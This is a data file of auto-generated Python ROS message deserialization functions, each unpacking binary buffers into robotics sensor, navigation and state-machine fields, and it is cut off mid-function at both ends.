self.sensed_objects = []\n for i in range(0, length):\n val1 = std_msgs.msg.String()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.data = str[start:end]\n self.sensed_objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.sensed_objects_map = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 100\n (_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, 
_x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y,) = _get_struct_h16fh8f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.RPY is None:\n self.RPY = geometry_msgs.msg.Vector3()\n if self.LLA is None:\n self.LLA = geometry_msgs.msg.Vector3()\n if self.NedVel is None:\n self.NedVel = geometry_msgs.msg.Vector3()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 116\n (_x.Time, _x.Week, _x.Status, _x.RPY.x, _x.RPY.y, _x.RPY.z, _x.LLA.x, _x.LLA.y, _x.LLA.z, _x.NedVel.x, _x.NedVel.y, _x.NedVel.z, _x.YawUncertainty, _x.PitchUncertainty, _x.RollUncertainty, _x.PosUncertainty, _x.VelUncertainty, _x.SyncInTime, _x.SyncInCount,) = _get_struct_d2H9d5fdI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 112\n (_x.u0, _x.h0, _x.vl, _x.i0, _x.wv, _x.wh, _x.wi, _x.h_stop, _x.T_gap, _x.v_max, _x.v_min, _x.h_min, _x.i_max, _x.i_min,) = _struct_14d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pointA is None:\n self.pointA = nubot_common.msg.Point2d()\n if self.pointB is None:\n self.pointB = nubot_common.msg.Point2d()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 26\n (_x.MatchMode, _x.MatchType, _x.TestMode, _x.pointA.x, _x.pointA.y, _x.pointB.x, _x.pointB.y, _x.angleA, _x.angleB, _x.idA, _x.idB, _x.kickforce,) = _get_struct_3B4f2h3B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.pose is None:\n self.pose = geometry_msgs.msg.PoseWithCovariance()\n end = 0\n _x = self\n start = end\n end += 72\n (_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w,) = _get_struct_Q8d().unpack(str[start:end])\n start = end\n end += 288\n self.pose.covariance = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=36)\n _x = self\n start = end\n end += 40\n (_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, 
_x.bbox_h,) = _get_struct_5d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.modality = str[start:end].decode('utf-8')\n else:\n self.modality = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.embed_vector = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 9\n (_x.dvl_sts, _x.svs_sts, _x.fog_sts, _x.nav_sts, _x.bat_sts, _x.t_sts, _x.h_sts, _x.p_sts, _x.water_sts,) = _struct_9B.unpack(str[start:end])\n self.dvl_sts = bool(self.dvl_sts)\n self.svs_sts = bool(self.svs_sts)\n self.fog_sts = bool(self.fog_sts)\n self.nav_sts = bool(self.nav_sts)\n self.bat_sts = bool(self.bat_sts)\n self.t_sts = bool(self.t_sts)\n self.h_sts = bool(self.h_sts)\n self.p_sts = bool(self.p_sts)\n self.water_sts = bool(self.water_sts)\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.predict is None:\n self.predict = argus_msgs.msg.FilterPredictStep()\n if self.update is None:\n self.update = argus_msgs.msg.FilterUpdateStep()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 26\n (_x.step_num, _x.info_type, _x.predict.step_dt, _x.predict.trans_jacobian.column_major, _x.predict.trans_jacobian.rows, _x.predict.trans_jacobian.cols,) = _get_struct_QBdB2I().unpack(str[start:end])\n self.predict.trans_jacobian.column_major = bool(self.predict.trans_jacobian.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.trans_jacobian.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.predict.trans_noise_cov.column_major, _x.predict.trans_noise_cov.rows, _x.predict.trans_noise_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.trans_noise_cov.column_major = bool(self.predict.trans_noise_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.trans_noise_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.predict.prior_state_cov.column_major, _x.predict.prior_state_cov.rows, _x.predict.prior_state_cov.cols,) = 
_get_struct_B2I().unpack(str[start:end])\n self.predict.prior_state_cov.column_major = bool(self.predict.prior_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.prior_state_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.predict.post_state_cov.column_major, _x.predict.post_state_cov.rows, _x.predict.post_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.post_state_cov.column_major = bool(self.predict.post_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.post_state_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.prior_state_cov.column_major, _x.update.prior_state_cov.rows, _x.update.prior_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.prior_state_cov.column_major = bool(self.update.prior_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.prior_state_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.prior_obs_error = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.obs_error_cov.column_major, _x.update.obs_error_cov.rows, _x.update.obs_error_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_error_cov.column_major = bool(self.update.obs_error_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_error_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.post_state_cov.column_major, _x.update.post_state_cov.rows, _x.update.post_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.post_state_cov.column_major = bool(self.update.post_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.post_state_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.state_delta = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.post_obs_error = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.obs_jacobian.column_major, _x.update.obs_jacobian.rows, _x.update.obs_jacobian.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_jacobian.column_major = bool(self.update.obs_jacobian.column_major)\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_jacobian.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.obs_noise_cov.column_major, _x.update.obs_noise_cov.rows, _x.update.obs_noise_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_noise_cov.column_major = bool(self.update.obs_noise_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_noise_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 1\n (self.type,) = _struct_B.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model = str[start:end].decode('utf-8')\n else:\n self.model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.head_version = str[start:end].decode('utf-8')\n else:\n self.head_version = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.body_version = str[start:end].decode('utf-8')\n else:\n self.body_version = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.arm_version = str[start:end].decode('utf-8')\n else:\n self.arm_version = str[start:end]\n _x = self\n start = end\n end += 14\n (_x.has_laser, _x.has_extended_arms, _x.number_of_legs, _x.number_of_arms, _x.number_of_hands,) = _struct_2B3i.unpack(str[start:end])\n self.has_laser = bool(self.has_laser)\n self.has_extended_arms = bool(self.has_extended_arms)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.base is None:\n self.base = rwrc12_msgs.msg.CellBase()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.base.header.seq, _x.base.header.stamp.secs, _x.base.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.base.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.base.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 20\n (_x.base.cell_width, _x.base.cell_height, _x.base.position.x, _x.base.position.y, _x.base.position.z,) = _struct_5f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.base.points = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point32()\n _x = val1\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n self.base.points.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.base.intensity = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 1\n (self.base.cost,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.base.label = str[start:end].decode('utf-8')\n else:\n self.base.label = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.mean_height, _x.mean_intensity,) = _struct_2f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.cond_transition is None:\n self.cond_transition = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_path = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.state_path = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_class = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.state_class = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.initial_state_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.initial_state_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.input_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.input_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.output_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.output_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cond_outcome = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.cond_outcome.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cond_transition = []\n for i in range(0, length):\n val1 = flexbe_msgs.msg.OutcomeCondition()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.state_name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2 = str[start:end]\n val1.state_name.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.state_outcome = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2 = str[start:end]\n val1.state_outcome.append(val2)\n self.cond_transition.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.behavior_class = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.behavior_class = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n 
self.parameter_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.parameter_names.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.parameter_values = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.parameter_values.append(val1)\n start = end\n end += 8\n self.position = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.outcomes = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.outcomes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.transitions = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.transitions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sb'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.autonomy = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.userdata_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.userdata_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.userdata_remapping = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.userdata_remapping.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 6\n (_x.sbpl_wait_flag, _x.sbpl_present_x, _x.sbpl_present_y, _x.sbpl_new_x, _x.sbpl_new_y, _x.start_P3DX_motion,) = _struct_B4bB.unpack(str[start:end])\n self.sbpl_wait_flag = bool(self.sbpl_wait_flag)\n self.start_P3DX_motion = bool(self.start_P3DX_motion)\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n 
self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 86\n (_x.sample_count, _x.ekf_roll, _x.ekf_pitch, _x.ekf_yaw, _x.ekf_lat, _x.ekf_lon, _x.ekf_alt, _x.ekf_vN, _x.ekf_vE, _x.ekf_vD, _x.ekf_vX, _x.ekf_vY, _x.ekf_vZ, _x.rad_gyro_X, _x.rad_gyro_Y, _x.rad_gyro_Z, _x.angular_acc_X, _x.angular_acc_Y, _x.angular_acc_Z, _x.alt_DVL,) = _get_struct_I3f2d13fH().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.dvl_error_code = str[start:end]\n _x = self\n start = end\n end += 73\n (_x.flag_to_check, _x.imu_deg_gyro_X, _x.imu_deg_gyro_Y, _x.imu_deg_gyro_Z, _x.imu_mag_X, _x.imu_mag_Y, _x.imu_mag_Z, _x.imu_acc_X, _x.imu_acc_Y, _x.imu_acc_Z, _x.gps_lat, _x.gps_lon, _x.gps_alt, _x.gps_vN, _x.gps_vE, _x.gps_vD, _x.dvl_vX, _x.dvl_vY, _x.dvl_vZ,) = _get_struct_B9f2i7f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.actors is None:\n self.actors = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.actors = []\n for i in range(0, length):\n val1 = nesfr3_msgs.msg.Actor()\n _v25 = val1.header\n start = end\n end += 4\n (_v25.seq,) = _get_struct_I().unpack(str[start:end])\n _v26 = _v25.stamp\n _x = _v26\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v25.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v25.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (val1.tracking_id,) = _get_struct_I().unpack(str[start:end])\n _v27 = val1.pose\n _v28 = _v27.pose\n _v29 = _v28.position\n _x = _v29\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v30 = _v28.orientation\n _x = _v30\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 288\n _v27.covariance = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=36)\n val1.points = []\n for i in range(0, 18):\n val2 = nesfr3_msgs.msg.PointWithConfidence()\n _v31 = val2.point\n _x = _v31\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (val2.confidence,) = _get_struct_f().unpack(str[start:end])\n val1.points.append(val2)\n _v32 = val1.nose_point\n _x = _v32\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.actors.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n 
_x = self\n start = end\n end += 56\n (_x.s_x, _x.s_y, _x.f_x, _x.f_y, _x.step_size, _x.bias_param, _x.max_iteration,) = _struct_7q.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 1\n (self.success,) = _struct_B.unpack(str[start:end])\n self.success = bool(self.success)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.c0 is None:\n self.c0 = bh_motion.msg.Vector3()\n if self.c1 is None:\n self.c1 = bh_motion.msg.Vector3()\n if self.c2 is None:\n self.c2 = bh_motion.msg.Vector3()\n end = 0\n _x = self\n start = end\n end += 36\n (_x.c0.x, _x.c0.y, _x.c0.z, _x.c1.x, _x.c1.y, _x.c1.z, _x.c2.x, _x.c2.y, _x.c2.z,) = _struct_9f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.canmsg = str[start:end].decode('utf-8')\n else:\n self.canmsg = str[start:end]\n _x = self\n start = end\n end += 30\n (_x.track_id, _x.track_lat_rate, _x.track_group_changed, _x.track_status, _x.track_angle, _x.track_range, _x.track_bridge_object, _x.track_rolling_count, _x.track_width, _x.track_range_accel, _x.track_med_range_mode, _x.track_range_rate,) = _get_struct_Bf2B2f2B2fBf().unpack(str[start:end])\n self.track_group_changed = bool(self.track_group_changed)\n self.track_bridge_object = bool(self.track_bridge_object)\n self.track_rolling_count = bool(self.track_rolling_count)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags,) = _get_struct_I2di6h8fI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 16\n (_x.FL_vel, _x.FR_vel, _x.BL_vel, _x.BR_vel,) = _struct_4i.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 12\n (_x.hlive, _x.hstate, _x.hfinished, _x.pressure, _x.c1, _x.c2, _x.c3, _x.c4, _x.c5, _x.c6, _x.c7, _x.c8,) = _struct_12B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = 
self\n start = end\n end += 24\n (_x.sysid, _x.compid, _x.limits_state, _x.last_trigger, _x.last_action, _x.last_recovery, _x.last_clear, _x.breach_count, _x.mods_enabled, _x.mods_required, _x.mods_triggered,) = _struct_3B4IH3B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.nodes is None:\n self.nodes = None\n end = 0\n _x = self\n start = end\n end += 14\n (_x.role, _x.id, _x.local_time, _x.system_time, _x.voltage,) = _get_struct_2B2If().unpack(str[start:end])\n start = end\n end += 12\n self.pos_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 12\n self.eop_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 12\n self.vel_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 12\n self.angle_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 16\n self.quaternion = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=4)\n start = end\n end += 12\n self.imu_gyro_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 12\n self.imu_acc_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.nodes = []\n for i in range(0, 